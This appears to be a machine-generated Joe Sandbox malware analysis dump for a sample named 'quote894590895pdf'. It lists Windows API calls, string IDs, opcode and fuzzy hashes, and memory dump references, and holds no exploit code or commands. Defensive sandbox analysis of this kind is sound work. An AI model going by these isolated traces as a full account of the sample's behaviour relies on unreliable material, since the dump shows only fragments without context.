                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: ce604c2a929c2c79a680ef0df09124fbd8d55b7f8dc8f0619b432a0bd6a1045f
                                                                    • Instruction ID: 14ed36c36ef12a32a8eb51d585c7435dc7a19a72414360af7db775e61186380b
                                                                    • Opcode Fuzzy Hash: ce604c2a929c2c79a680ef0df09124fbd8d55b7f8dc8f0619b432a0bd6a1045f
                                                                    • Instruction Fuzzy Hash: 7E41DD30041948DFDB215F28BC98BB93B61EB06764F249269FE61AE1F2C7318D42DB21
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,00EEF910), ref: 00ECA995
                                                                    • GetDriveTypeW.KERNEL32(00000061,00F189A0,00000061), ref: 00ECAA5F
                                                                    • _wcscpy.LIBCMT ref: 00ECAA89
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: c2758be5af104d1504b361053911fa3a5240d55b89ed317752ae8e01c50b3591
                                                                    • Instruction ID: 2f98b1490a39ca5fc2be661d8bf8d9326e3f94ffda51a21f45293293a4ae66d4
                                                                    • Opcode Fuzzy Hash: c2758be5af104d1504b361053911fa3a5240d55b89ed317752ae8e01c50b3591
                                                                    • Instruction Fuzzy Hash: AE51C3311083049BC710EF14DAD2EAAB7E5EF84748F54682DF496772A2DB329D4ACB53
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __i64tow__itow__swprintf
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 421087845-2263619337
                                                                    • Opcode ID: 768bb96c2f4a0e8c7cbcbf9f423e0e245bef578b55ac47d802e4c44b1a9c2d47
                                                                    • Instruction ID: 00f904f40d7d393b4ae958510ae8f4a2c26a082b21e6f0e43a2b3fb50a2ffb81
                                                                    • Opcode Fuzzy Hash: 768bb96c2f4a0e8c7cbcbf9f423e0e245bef578b55ac47d802e4c44b1a9c2d47
                                                                    • Instruction Fuzzy Hash: 0441E471644205AEDF38AB74D842EBAB3E8EF44354F2094AEE54DF6292EA319942C711
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EE719C
                                                                    • CreateMenu.USER32 ref: 00EE71B7
                                                                    • SetMenu.USER32(?,00000000), ref: 00EE71C6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE7253
                                                                    • IsMenu.USER32(?), ref: 00EE7269
                                                                    • CreatePopupMenu.USER32 ref: 00EE7273
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EE72A0
                                                                    • DrawMenuBar.USER32 ref: 00EE72A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0$F
                                                                    • API String ID: 176399719-3044882817
                                                                    • Opcode ID: c127f16c07ab7690c29201eab1615034f1a12da7fff8217f2f9fcfa58dcbdd4d
                                                                    • Instruction ID: a258b42796935e53241febdd033eb92ce7a7472b16a59e7df0ce46fca74435a0
                                                                    • Opcode Fuzzy Hash: c127f16c07ab7690c29201eab1615034f1a12da7fff8217f2f9fcfa58dcbdd4d
                                                                    • Instruction Fuzzy Hash: 00415BB4A01249EFDB20DF65D884A9A7BF9FF49300F144129FA45A7360D731AD14DFA0
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EE7590
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00EE7597
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EE75AA
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EE75B2
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EE75BD
                                                                    • DeleteDC.GDI32(00000000), ref: 00EE75C6
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EE75D0
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EE75E4
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EE75F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: bcf5ace470fd857b935b1aac4ea5540ad25976a5dac62f994c0cf3ea887a59f5
                                                                    • Instruction ID: 3fd125f574993e3d828464016bb733abbe54b307f713a269c499817ccaaa5089
                                                                    • Opcode Fuzzy Hash: bcf5ace470fd857b935b1aac4ea5540ad25976a5dac62f994c0cf3ea887a59f5
                                                                    • Instruction Fuzzy Hash: 2E318A3210529DAFDF129FA6DC48FEB3B69EF09365F101224FA55B61A0C731E814DBA0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00E86FBB
                                                                      • Part of subcall function 00E88CA8: __getptd_noexit.LIBCMT ref: 00E88CA8
                                                                    • __gmtime64_s.LIBCMT ref: 00E87054
                                                                    • __gmtime64_s.LIBCMT ref: 00E8708A
                                                                    • __gmtime64_s.LIBCMT ref: 00E870A7
                                                                    • __allrem.LIBCMT ref: 00E870FD
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E87119
                                                                    • __allrem.LIBCMT ref: 00E87130
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E8714E
                                                                    • __allrem.LIBCMT ref: 00E87165
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E87183
                                                                    • __invoke_watson.LIBCMT ref: 00E871F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                    • Instruction ID: dd1644c9b7098ffa7e10fcbf2b24cf5f6e7c27a87730e0a41a13fb0d966401e3
                                                                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                    • Instruction Fuzzy Hash: 64711972A41716ABEB14BE79DC81B9AB3E8AF10328F245129F55CF7681E770DD408790
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EC283A
                                                                    • GetMenuItemInfoW.USER32(00F25890,000000FF,00000000,00000030), ref: 00EC289B
                                                                    • SetMenuItemInfoW.USER32(00F25890,00000004,00000000,00000030), ref: 00EC28D1
                                                                    • Sleep.KERNEL32(000001F4), ref: 00EC28E3
                                                                    • GetMenuItemCount.USER32(?), ref: 00EC2927
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00EC2943
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00EC296D
                                                                    • GetMenuItemID.USER32(?,?), ref: 00EC29B2
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EC29F8
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC2A0C
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC2A2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: 463eb693b4b87d20b4f06da2333bdaf28637cb361dadd927d2b8edd022fa56c0
                                                                    • Instruction ID: 209960232a249726ab85c935b5b3f46a94ac6c5231859c4c41e4b6505f6ef5e7
                                                                    • Opcode Fuzzy Hash: 463eb693b4b87d20b4f06da2333bdaf28637cb361dadd927d2b8edd022fa56c0
                                                                    • Instruction Fuzzy Hash: AC61A170900249AFDB25CF64CE88FAE7BB8EB45308F14515DFA42B7291D732AD06DB21
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EE6FD7
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EE6FDA
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EE6FFE
                                                                    • _memset.LIBCMT ref: 00EE700F
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EE7021
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EE7099
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: f8f10d065cb40490d7ac2de75148e5d7d18fbe38a27f3827cbf689e8e8722fbc
                                                                    • Instruction ID: df477570d3666945b3d75cea3124cfc8bc6d169fb67a0e481331451dfe8da856
                                                                    • Opcode Fuzzy Hash: f8f10d065cb40490d7ac2de75148e5d7d18fbe38a27f3827cbf689e8e8722fbc
                                                                    • Instruction Fuzzy Hash: 3C616C75A00248AFDB20DFA4CC81EEE77F8EB09714F144169FA55EB2A1C770AD45DB60
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EB6F15
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00EB6F6E
                                                                    • VariantInit.OLEAUT32(?), ref: 00EB6F80
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EB6FA0
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00EB6FF3
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EB7007
                                                                    • VariantClear.OLEAUT32(?), ref: 00EB701C
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00EB7029
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EB7032
                                                                    • VariantClear.OLEAUT32(?), ref: 00EB7044
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EB704F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 4f949630c2020da9d0c2da1ea156b163fb0b002728cb229dbc91b1cc22b5304d
                                                                    • Instruction ID: 753df7f2597b30cc70dfcb3be3bdbd6b8044e6ff3fb5dd059bdb0016164be2e7
                                                                    • Opcode Fuzzy Hash: 4f949630c2020da9d0c2da1ea156b163fb0b002728cb229dbc91b1cc22b5304d
                                                                    • Instruction Fuzzy Hash: 78415035A001199FCB04EFA5D884DEEBBB9FF48354F009069F955BB261CB35A945CB90
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00ED58A9
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 00ED58EE
                                                                    • gethostbyname.WSOCK32(?), ref: 00ED58FA
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00ED5908
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00ED5978
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00ED598E
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00ED5A03
                                                                    • WSACleanup.WSOCK32 ref: 00ED5A09
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: ce6e08f3bd2d28f265a65b5bff808c94e7b8bfe5a68f5aaf07647c6f11d5f62e
                                                                    • Instruction ID: a13a0b4ff72fc56b1c68399c2045801537ad57877e44b9ca9e55603da3090ba3
                                                                    • Opcode Fuzzy Hash: ce6e08f3bd2d28f265a65b5bff808c94e7b8bfe5a68f5aaf07647c6f11d5f62e
                                                                    • Instruction Fuzzy Hash: C251B032644700DFD711AF24DC95B6AB7E4EF88720F04592AF9A6FB2A1DB30E805DB41
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00ECB55C
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ECB5D2
                                                                    • GetLastError.KERNEL32 ref: 00ECB5DC
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00ECB649
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: cba55bd29824b4ac2a178d1dafee14f67bb24a45f7e522ca5320f1e8430252b1
                                                                    • Instruction ID: fb70850e4b9b3da51706a6d68db57eb208eb6dd091d945b20d3acbdde3cf88d2
                                                                    • Opcode Fuzzy Hash: cba55bd29824b4ac2a178d1dafee14f67bb24a45f7e522ca5320f1e8430252b1
                                                                    • Instruction Fuzzy Hash: 1431CE75A042089FCB00DFA5DA86FEEB7B8EF44344F145029F401FB292DB729A42CB91
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EBAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00EBAEC7
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EB92D6
                                                                    • GetDlgCtrlID.USER32 ref: 00EB92E1
                                                                    • GetParent.USER32 ref: 00EB92FD
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EB9300
                                                                    • GetDlgCtrlID.USER32(?), ref: 00EB9309
                                                                    • GetParent.USER32(?), ref: 00EB9325
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EB9328
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 67d4181ca60cb3a356d1a29c5423946002bd86c2460082be7a260faf3d09db1b
                                                                    • Instruction ID: e3768a755cfeb38e17e9fc4fa81472d50664c0f7eae70335084806794f1fa86f
                                                                    • Opcode Fuzzy Hash: 67d4181ca60cb3a356d1a29c5423946002bd86c2460082be7a260faf3d09db1b
                                                                    • Instruction Fuzzy Hash: 4F21F170A40248BFCF04ABA1CCC5DFEBBB4EF49310F101126F961A72E2DB759959DA60
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EBAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00EBAEC7
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EB93BF
                                                                    • GetDlgCtrlID.USER32 ref: 00EB93CA
                                                                    • GetParent.USER32 ref: 00EB93E6
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EB93E9
                                                                    • GetDlgCtrlID.USER32(?), ref: 00EB93F2
                                                                    • GetParent.USER32(?), ref: 00EB940E
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EB9411
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 569aeb0df24b5bb645cd9c5557e2386b98dca583d0ca6d697137269cfa8e3f1d
                                                                    • Instruction ID: c628128478a7a8e1c88ee7f60b7eddedaddb1c1f35eab452c2216676bd7bab39
                                                                    • Opcode Fuzzy Hash: 569aeb0df24b5bb645cd9c5557e2386b98dca583d0ca6d697137269cfa8e3f1d
                                                                    • Instruction Fuzzy Hash: 5621D371A40248BFDF00ABA5CCC5EFEBBB4EF44300F105026F961A71A6DB759959DA20
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00EB9431
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00EB9446
                                                                    • _wcscmp.LIBCMT ref: 00EB9458
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EB94D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: 440790b6ccb4b5ff013e8460bcd5a4ab68d28bcb6260781d4852a57b990c6cd1
                                                                    • Instruction ID: e3ae2474086cec55c88dfc25d6af608f7a31cea3de5cd3a83711b4757b1d897d
                                                                    • Opcode Fuzzy Hash: 440790b6ccb4b5ff013e8460bcd5a4ab68d28bcb6260781d4852a57b990c6cd1
                                                                    • Instruction Fuzzy Hash: 82110D3624830B7EF6103634AC46DE737AC8B15724B205016FA1CF50E2FEA299565695
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00EC7B15
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: 6030ae7d802b0e61a3af12b028036204e01481d3e88bddc5426f68fc5cf55e11
                                                                    • Instruction ID: d8e779c8d3f08f3a6ab2c8e20b227d580f9addc1a12eb2164132b33f955fcd4d
                                                                    • Opcode Fuzzy Hash: 6030ae7d802b0e61a3af12b028036204e01481d3e88bddc5426f68fc5cf55e11
